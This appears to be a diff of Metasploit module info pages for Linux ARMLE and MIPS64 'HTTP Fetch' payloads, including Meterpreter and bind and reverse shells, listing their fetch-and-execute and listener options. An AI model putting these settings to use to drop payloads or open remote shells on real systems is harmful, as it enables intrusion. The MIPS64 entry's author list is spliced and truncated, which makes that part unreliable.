FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,97 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/armle/meterpreter_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME eOJorghpY no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,85 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager
|
||||
Module: payload/cmd/linux/http/armle/shell/bind_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
nemo <nemo@felinemenace.org>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME DNCjskbcX no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
dup2 socket in r12, then execve.
|
||||
|
||||
Listen for a connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,93 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/armle/shell/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 102
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
nemo <nemo@felinemenace.org>
|
||||
tkmru
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME GqKkLiLQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
dup2 socket in r12, then execve.
|
||||
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,76 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
|
||||
Module: payload/cmd/linux/http/armle/shell_bind_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
civ
|
||||
hal
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ARGV0 sh no argv[0] to pass to execve
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
SHELL /bin/sh yes The shell to execute.
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME spYHQrQwU no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
Connect to target and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,82 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
|
||||
Module: payload/cmd/linux/http/armle/shell_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 102
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
civ
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ARGV0 sh no argv[0] to pass to execve
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SHELL /bin/sh yes The shell to execute.
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME EzSqYGrB no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,104 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_http
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 102
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
ok@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME jkofOBXy no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute a MIPS64 payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
